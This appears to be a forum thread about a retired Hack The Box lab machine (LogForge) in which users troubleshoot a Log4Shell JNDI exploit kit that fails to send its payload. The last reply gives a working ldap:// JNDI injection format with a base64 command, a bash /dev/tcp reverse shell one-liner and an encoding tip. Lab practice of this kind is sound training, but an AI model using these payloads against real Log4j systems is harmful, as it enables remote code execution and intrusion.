I’ve been going through some retired HTB boxes and was trying to do LogForge using HTB’s PwnBox. I get up to the point where I’m using the ****-Exploit-Kit and I have the payload ready to go. However, when using the exploit, tcpdump will say it connects correctly to the **AP server then redirect to port 8081 for a subsequent payload but that last redirection doesn’t happen at all. ****-Exploit-Kit doesn’t send the payload. I’m not sure if anyone else has had any luck using PwnBox for this machine. I also tried using a personal Parrot VM but hit the same problem. I’m following a walkthrough/write-up and the exploit kit should be sending the payload right after it says “redirecting to XYZ”.
I don’t have the walk-through to reference… from my notes if I am looking at the right part anyway, it looks like I used the kit to generate the payload (assuming your talking about the JNDI exploit kit? ) and then either use Burp or tomcat to actually send the payload. Hopefully that makes sense/helps. Also if you didn’t already I would highly recommend watching ippsec’s video on youtube of the box.
I tried to use Burp to send the payload and I also tried doing it directly via the web GUI. I have watched Ippsec’s video and I was hoping to follow it because his stuff is really good and detailed. I wasn’t able to get the same results as him though. Maybe I’ll try again another time.
Same issue here. I can’t replicate the walkthroughs…
I followed ippsec’s video walkthrough and just like @_dials , it says “redirecting to port 8081…” instead of displaying the serialized payload like in ippsec’s video.
I was able to get it to display the serialized payload by utilizing the dynamic generation functionality of the ****-Exploit-Kit, like this:
However, it doesn’t look like it ever executes the payload server-side (I didn’t see any ICMP packets come back in tcpdump)
I finally figured this bug out after half a day!
writeups no longer valid but reverse shell still possible:
install Java 11:
source: java - log4shell POC : no HTTP redirect - Stack Overflow
don’t use the JNDI links, instead use ldap://IP:PORT/serial/[payload_name]/exec_unix/[base64_command]
Hint : have you decoded the given example? is that what you want to run?
use this revere shell:
bash -c “0<&196;exec 196<>/dev/tcp/IP/PORT; sh <&196 >&196 2>&196”
source: Reverse Shells | OSCP Notes
Optional Hint: if base64 “+” is rejected, would %2B work instead?
first time contributing to the community